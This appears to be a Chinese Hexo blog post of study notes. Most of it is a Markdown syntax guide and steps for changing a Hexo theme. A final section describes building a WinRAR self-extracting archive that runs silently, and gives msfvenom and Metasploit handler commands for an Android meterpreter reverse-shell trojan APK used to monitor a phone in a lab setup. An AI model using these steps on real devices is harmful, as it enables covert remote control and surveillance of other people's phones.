<h4 id="下划线"><a href="#下划线" class="headerlink" title="下划线"></a>下划线</h4><p>下划线可以通过 HTML标签来实现</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;u&gt;带下划线文本&lt;/u&gt;</span><br></pre></td></tr></table></figure>

<h4 id="脚注"><a href="#脚注" class="headerlink" title="脚注"></a>脚注</h4><p>脚注是对文本的补充说明。Markdown 脚注的格式如下:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[^要注明的文本]</span><br></pre></td></tr></table></figure>

<h4 id="换行"><a href="#换行" class="headerlink" title="换行"></a>换行</h4><p>在当前行的结尾加 2 个空格</p>
<p>这行就会新起一行</p>
<h4 id="列表"><a href="#列表" class="headerlink" title="列表"></a>列表</h4><p>Markdown 支持有序列表和无序列表。</p>
<p>无序列表使用星号(*)、加号(+)或是减号(-)作为列表标记：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">* 第一项</span><br><span class="line">* 第二项</span><br><span class="line">* 第三项</span><br><span class="line"></span><br><span class="line">+ 第一项</span><br><span class="line">+ 第二项</span><br><span class="line">+ 第三项</span><br><span class="line"></span><br><span class="line">- 第一项</span><br><span class="line">- 第二项</span><br><span class="line">- 第三项</span><br></pre></td></tr></table></figure>

<p> 有序列表使用数字并加上 . 号来表示,如：  </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1. 第一项：</span><br><span class="line">    - 第一项嵌套的第一个元素</span><br><span class="line">    - 第一项嵌套的第二个元素</span><br><span class="line">2. 第二项：</span><br><span class="line">    - 第二项嵌套的第一个元素</span><br><span class="line">    - 第二项嵌套的第二个元素</span><br></pre></td></tr></table></figure>

<h4 id="区块引用"><a href="#区块引用" class="headerlink" title="区块引用"></a>区块引用</h4><p>Markdown 区块引用是在段落开头使用 &gt; 符号 ，然后后面紧跟一个空格符号</p>
<h4 id="代码"><a href="#代码" class="headerlink" title="代码"></a>代码</h4><p>可以用 &#96;&#96;&#96; 包裹一段代码，并指定一种语言（也可以不指定）：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">​```javascript</span><br><span class="line">$(document).ready(function () &#123;</span><br><span class="line">    alert(&#x27;RUNOOB&#x27;);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<h4 id="链接"><a href="#链接" class="headerlink" title="链接"></a>链接</h4><p>链接使用方法如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">   [链接名称](链接地址)</span><br><span class="line">或者&lt;链接地址&gt;</span><br></pre></td></tr></table></figure>

<h4 id="图片"><a href="#图片" class="headerlink" title="图片"></a>图片</h4><p>Markdown 图片语法格式如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">![alt 属性文本](图片地址)</span><br><span class="line">![alt 属性文本](图片地址 &quot;可选标题&quot;)</span><br></pre></td></tr></table></figure>

<p>开头一个感叹号 !</p>
<p>接着一个方括号，里面放上图片的替代文字</p>
<p>接着一个普通括号，里面放上图片的网址，最后还可以用引号包住并加上选择性的 ‘title’ 属性的文字。</p>
<h4 id="表格"><a href="#表格" class="headerlink" title="表格"></a>表格</h4><p>制作表格使用 | 来分隔不同的单元格，使用 - 来分隔表头和其他行。语法格式如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">|  表头   | 表头  |</span><br><span class="line">|  ----  | ----  |</span><br><span class="line">| 单元格  | 单元格 |</span><br><span class="line">| 单元格  | 单元格 |</span><br></pre></td></tr></table></figure>

<h4 id="支持的HTML元素"><a href="#支持的HTML元素" class="headerlink" title="支持的HTML元素"></a>支持的HTML元素</h4><p>目前支持的 HTML 元素有</p>
<p><kbd> <b> <i> <em> <sup> <sub> <br></p>
<p><code>使用 &lt;kbd&gt;Ctrl&lt;/kbd&gt;+&lt;kbd&gt;Alt&lt;/kbd&gt;+&lt;kbd&gt;Del&lt;/kbd&gt; 重启电脑</code></p>
<h4 id="转义字符"><a href="#转义字符" class="headerlink" title="转义字符"></a>转义字符</h4><p>如果需要显示特定的符号则需要使用转义字符，Markdown 使用反斜杠转义特殊字符：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">**文本加粗** </span><br><span class="line">\*\* 正常显示星号 \*\*</span><br></pre></td></tr></table></figure>

<p> 支持以下这些符号前面加上反斜杠来帮助插入普通的符号：  </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">\   反斜线</span><br><span class="line">`   反引号</span><br><span class="line">*   星号</span><br><span class="line">_   下划线</span><br><span class="line">&#123;&#125;  花括号</span><br><span class="line">[]  方括号</span><br><span class="line">()  小括号</span><br><span class="line">#   井字号</span><br><span class="line">+   加号</span><br><span class="line">-   减号</span><br><span class="line">.   英文句点</span><br><span class="line">!   感叹号</span><br></pre></td></tr></table></figure>

<h3 id="3-3主题更换"><a href="#3-3主题更换" class="headerlink" title="3.3	主题更换"></a>3.3	主题更换</h3><h4 id="下载主题"><a href="#下载主题" class="headerlink" title="下载主题"></a>下载主题</h4><p>进入该主题的github下载页，我选择主题下载页是这里： <a target="_blank" rel="noopener" href="https://github.com/hexojs/hexo-theme-light">https://github.com/hexojs/hexo-theme-light</a> ，点击Code -> Clone，复制</p>
<p>https下载链接。主题的存放目录是 ./themes，为了方便管理，每一个下载的主题都建一个单独的目录，我这个主题的目录是./light。</p>
<p>然后在本机上进入博客的目录，我本机上是~/blog/ ，运行如下命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cd ./themes</span><br><span class="line">git clone https://github.com/hexojs/hexo-theme-light.git ./light</span><br></pre></td></tr></table></figure>

<h4 id="主题生效"><a href="#主题生效" class="headerlink" title="主题生效"></a>主题生效</h4><p>找到博客目录下的配置文件 _config.yml, 找到Extensions模块，修改字段。由于我是第一次更换主题，之前使用的是默认主题，修改前的</p>
<p>配置是这样的：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># Extensions</span><br><span class="line">## Plugins: https://hexo.io/plugins/</span><br><span class="line">## Themes: https://hexo.io/themes/</span><br><span class="line">theme: landscape</span><br></pre></td></tr></table></figure>

<p>修改成我新下载的light主题之后是这样的：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># Extensions</span><br><span class="line">## Plugins: https://hexo.io/plugins/</span><br><span class="line">## Themes: https://hexo.io/themes/</span><br><span class="line">theme: light</span><br></pre></td></tr></table></figure>

<p>然后，通过运行命令 hexo s ，启动本地服务，通过<a target="_blank" rel="noopener" href="http://localhost:4000/">http://localhost:4000/</a> 查看修改后的效果。</p>
<p>运行以下命令，使主题更新到博客</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">hexo clean</span><br><span class="line">hexo g</span><br><span class="line">hexo d</span><br></pre></td></tr></table></figure>

<h4 id="主题更新"><a href="#主题更新" class="headerlink" title="主题更新"></a>主题更新</h4><p>这一步不是必须的，如果主题有优化更新或者修改bug之后，我们在本地需要同步更新一下，在博客目录运行如下命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cd ./themes/light/</span><br><span class="line">git pull</span><br></pre></td></tr></table></figure>

<h1 id="五、自解压文件与apk应用程序木马"><a href="#五、自解压文件与apk应用程序木马" class="headerlink" title="五、	自解压文件与apk应用程序木马"></a>五、	自解压文件与apk应用程序木马</h1><h2 id="1-自解压文件"><a href="#1-自解压文件" class="headerlink" title="1.	自解压文件"></a>1.	自解压文件</h2><p>下载解压并安装WinRAR：<a target="_blank" rel="noopener" href="https://github.com/hackxc/xss_flash/blob/master/WinRAR%205.9.0/winrar5.90.rar">https://github.com/hackxc/xss_flash/blob/master/WinRAR%205.9.0/winrar5.90.rar</a></p>
<p>选择文件，右键通过WinRAR压缩</p>
<p>在一般选项中勾选创建自解压文件</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231203154609161.png" alt="image-20231203154609161"></p>
<p>在高级选项中点击自解压选项</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231203154815846.png" alt="image-20231203154815846"></p>
<p>填写解压路径，一般为Temp文件夹：C:\Windows\Temp	（绝对路径）</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231203155138671.png" alt="image-20231203155138671"></p>
<p>在安装选项中添加解压运行文件，并在模式选项中勾选隐藏所有</p>
<p><img src="https://cdn.jsdelivr.net/gh/WEIYV7/image@main//imgimage-20231203155431839.png" alt="image-20231203155431839"></p>
<p>更新选项中勾选解压并更新文件和覆盖所有文件，之后确定自解压完成</p>
<h2 id="2-apk应用程序木马"><a href="#2-apk应用程序木马" class="headerlink" title="2.	apk应用程序木马"></a>2.	apk应用程序木马</h2><h3 id="2-1木马生成"><a href="#2-1木马生成" class="headerlink" title="2.1	木马生成"></a>2.1	木马生成</h3><p>靶机：手机</p>
<p>攻击机：Kali	IP：192.168.43.131</p>
<p>在Kali的root权限终端中输入命令生成木马apk文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R &gt; /home/kali/apk.apk</span><br></pre></td></tr></table></figure>

<h3 id="2-2进行监控"><a href="#2-2进行监控" class="headerlink" title="2.2	进行监控"></a>2.2	进行监控</h3><p>生成后将生成的apk文件在手机中安装，再msf中执行命令监控安装apk手机</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">use exploit/multi/handler   						//加载模块</span><br><span class="line">set payload android/meterpreter/reverse_tcp   		//选择Payload</span><br><span class="line">show options   										//查看参数设置</span><br><span class="line">set LHOST kali IP  									//这里的地址设置成我们刚才生成木马的IP地址</span><br><span class="line">set LPORT 5555   									//这里的端口设置成刚才我们生成木马所监听的端口</span><br><span class="line">exploit   											//开始执行漏洞 开始监听,等待手机上线</span><br></pre></td></tr></table></figure>

<p>成功后就可以通过终端监控手机</p>
 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <div class="declare">
      <ul class="post-copyright">
        <li>
          <i class="ri-copyright-line"></i>
          <strong>Copyright： </strong>
          
          Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.
          
        </li>
      </ul>
    </div>
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=http://example.com/2023/12/02/%E7%AC%AC%E4%B8%80%E5%91%A8/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
    </footer>
  </div>

   
  <nav class="article-nav">
    
      <a href="/2023/12/04/%E7%AC%AC%E4%BA%8C%E5%91%A8/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            第二周
          
        </div>
      </a>
    
    
  </nav>

  
   
  
   
    <script src="https://cdn.staticfile.org/twikoo/1.4.18/twikoo.all.min.js"></script>
    <div id="twikoo" class="twikoo"></div>
    <script>
        twikoo.init({
            envId: ""
        })
    </script>
 
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2015-2023
        <i class="ri-heart-fill heart_icon"></i> John Doe
      </li>
    </ul>
    <ul>
      <li>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>Visitors:<span id="busuanzi_value_site_uv"></span></span>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>Views:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s9.cnzz.com/z_stat.php?id=1278069914&amp;web_id=1278069914'></script>
        
      </li>
    </ul>
  </div>
</footer>    
    </main>
    <div class="float_btns">
      <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

    </div>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/ayer-side.svg" alt="Hexo"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags/%E6%97%85%E8%A1%8C/">旅行</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" target="_blank" rel="noopener" href="http://shenyu-vip.lofter.com">摄影</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/friends">友链</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/2019/about">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="Search">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="/images/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="/images/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-3.6.0.min.js"></script>
 
<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->
 
<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: ".tocbot",
    contentSelector: ".article-entry",
    headingSelector: "h1, h2, h3, h4, h5, h6",
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: "main",
    positionFixedSelector: ".tocbot",
    positionFixedClass: "is-position-fixed",
    fixedSidebarOffset: "auto",
  });
</script>

<script src="https://cdn.staticfile.org/jquery-modal/0.9.2/jquery.modal.min.js"></script>
<link
  rel="stylesheet"
  href="https://cdn.staticfile.org/jquery-modal/0.9.2/jquery.modal.min.css"
/>
<script src="https://cdn.staticfile.org/justifiedGallery/3.8.1/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->
 <!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/photoswipe/4.1.3/default-skin/default-skin.min.css">
<script src="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe.min.js"></script>
<script src="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script> 
<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->
 
<script src="/js/busuanzi-2.3.pure.min.js"></script>
 
<!-- ClickLove -->
 
<script src="/js/clickLove.js"></script>
 
<!-- ClickBoom1 -->

<!-- ClickBoom2 -->

<!-- CodeCopy -->
 
<link rel="stylesheet" href="/css/clipboard.css">
 <script src="https://cdn.staticfile.org/clipboard.js/2.0.10/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>
 
<!-- CanvasBackground -->

<script>
  if (window.mermaid) {
    mermaid.initialize({ theme: "forest" });
  }
</script>


    
    

  </div>
</body>

</html>